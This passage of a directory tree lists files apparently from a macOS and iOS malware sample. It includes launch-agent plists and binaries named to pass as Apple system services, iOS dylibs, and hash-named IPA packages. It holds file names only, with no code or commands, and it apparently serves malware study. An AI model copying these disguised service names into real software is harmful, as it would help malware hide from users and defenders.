│   │   │       libplist.2.dylib
│   │   │       libssl.1.0.0.dylib
│   │   │       libusbmuxd.2.dylib
│   │   │       libxml2.2.dylib
│   │   │       libz.1.dylib
│   │   │
│   │   ├───log
│   │   └───update
│   ├───version_B
│   │       com.apple.globalupdate.plist
│   │       com.apple.itunesupdate.plist
│   │       com.apple.machook_damon.plist
│   │       com.apple.watchproc.plist
│   │       globalupdate
│   │       itunesupdate
│   │       machook
│   │       start
│   │       WatchProc
│   │
│   └───version_C
│       │   com.apple.appstore.plughelper.plist
│       │   com.apple.appstore.PluginHelper
│       │   com.apple.MailServiceAgentHelper
│       │   com.apple.MailServiceAgentHelper.plist
│       │   com.apple.periodic-dd-mm-yy.plist
│       │   com.apple.systemkeychain-helper.plist
│       │   periodicdate
│       │   stty5.11.pl
│       │   systemkeychain-helper
│       │
│       └───manpath.d
│               libcrypto.1.0.0.dylib
│               libiconv.2.dylib
│               libimobiledevice.4.dylib
│               libiodb.dylib
│               liblzma.5.dylib
│               libplist.2.dylib
│               libssl.1.0.0.dylib
│               libusbmuxd.2.dylib
│               libxml2.2.dylib
│               libz.1.dylib
│               libzip.2.dylib
├───iOS
│       sfbase.dylib
│       sfbase_v4000.dylib
│       sfbase_v4001.dylib
│       start
│       stty5.11.pl
├───IPAs
│       7b9e685e89b8c7e11f554b05cdd6819a
│       pphelper
├───original
│       BikeBaron
│       CleanApp
│       FontMap1.cfg
│       start.sh
└───update
        start.sh
        update